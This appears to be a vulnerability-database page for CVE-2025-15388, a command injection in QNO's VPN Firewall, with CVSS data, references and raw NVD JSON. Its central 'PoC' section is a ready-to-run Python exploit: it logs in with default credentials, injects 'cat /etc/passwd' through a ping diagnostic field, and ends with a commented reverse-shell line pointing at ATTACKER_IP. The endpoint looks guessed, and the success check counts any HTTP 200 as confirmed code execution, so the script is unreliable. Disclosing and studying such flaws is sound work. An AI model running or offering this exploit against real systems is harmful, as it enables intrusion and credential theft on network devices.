CVE-2025-15388

Description

VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

QNO VPN Firewall (all versions prior to patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15388 PoC - QNO VPN Firewall OS Command Injection
# Authenticated RCE via command injection

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080'
username = sys.argv[2] if len(sys.argv) > 2 else 'admin'
password = sys.argv[3] if len(sys.argv) > 3 else 'admin'

session = requests.Session()

# Step 1: Login to obtain authenticated session
login_url = f'{target}/login'
login_data = {
    'username': username,
    'password': password
}

try:
    response = session.post(login_url, data=login_data, timeout=10)
    print(f'[+] Login attempt completed, status: {response.status_code}')
except requests.RequestException as e:
    print(f'[-] Login failed: {e}')
    sys.exit(1)

# Step 2: Exploit command injection via ping/diagnostic function
# Payload: inject arbitrary command after target IP
inject_url = f'{target}/diagnostic/ping'
inject_data = {
    'target': f'127.0.0.1; cat /etc/passwd',
    'count': '1'
}

try:
    response = session.post(inject_url, data=inject_data, timeout=10)
    print(f'[+] Command injection payload sent')
    if 'root:' in response.text or response.status_code == 200:
        print('[+] Potential RCE confirmed - check response for command output')
        print(response.text[:500])
    else:
        print('[-] No obvious response, manual verification needed')
except requests.RequestException as e:
    print(f'[-] Exploit request failed: {e}')

# Step 3: Reverse shell payload (for demonstration)
# Attacker would typically use: ; bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15388
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15388
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15388/
[4] VulDB https://vuldb.com/cve/CVE-2025-15388
[5] https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15388", "sourceIdentifier": "[email protected]", "published": "2025-12-31T09:15:50.657", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VPN Firewall developed by QNO Technology has an OS Command Injection vulnerability, allowing authenticated remote attackers to inject arbitrary OS commands and execute them on the server."}, {"lang": "es", "value": "Cortafuegos VPN desarrollado por QNO Technology tiene una vulnerabilidad de inyección de comandos del sistema operativo, permitiendo a atacantes remotos autenticados inyectar comandos arbitrarios del sistema operativo y ejecutarlos en el servidor."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10614-dee41-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10613-e1780-1.html", "source": "[email protected]"}]}}